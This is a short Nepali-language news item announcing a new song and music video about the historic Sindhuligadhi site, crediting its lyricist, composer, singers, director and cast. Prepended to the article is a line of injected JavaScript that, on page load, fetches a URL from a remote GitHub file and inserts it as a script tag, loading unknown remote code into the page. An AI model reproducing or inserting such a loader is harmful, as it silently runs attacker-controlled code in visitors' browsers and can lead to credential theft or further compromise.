;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);});
असोज २७,
काठमाडौँ । मुलुकको ऐतिहासिक थलोको रुपमा चिनिने सिन्धुली जिल्लाको ‘सिन्धुलीगढी’ लाई समेटेर नयाँ गीत बजारमा आएको छ ।
‘सम्झीसम्झी एक्लै मरुँदा’ बोलको गीत मंगलबार भावना म्युजिक सोलुसनको अफिसियल युट्युब च्यानलमार्फत म्युजिक भिडियोसहित सार्वजनिक भएको हो ।
शान्ति बस्नेतको शब्द र १०० भन्दा बढी चर्तित गीतहरुमा संगीत गर्नु भएका युवा संगीतकार अनिल विरहीको संगीतमा रहेको गीतमा रामकुमार नेपाली र मेलिना राईको आवज रहेको छ । अर्जुन गौतमको निर्देशनमा बनेको गीतको म्युजिक भिडियोमा अञ्जली अधिारी र काजिश श्रेष्ठ, लोमस शर्मा, अर्जुन गौतमको अभिनय रहेको छ ।
गीतको कारियोग्राफी काजिश श्रेष्ठकै रहेको छ भने राजेश घिमिरेले छायांकन गरेको भिडियोमा दीपक बिष्टको सम्पादन रहेको छ ।
म्युजिक भिडियो तल हेर्नुहोस् ।
फेसबुक प्रतिक्रियाहरु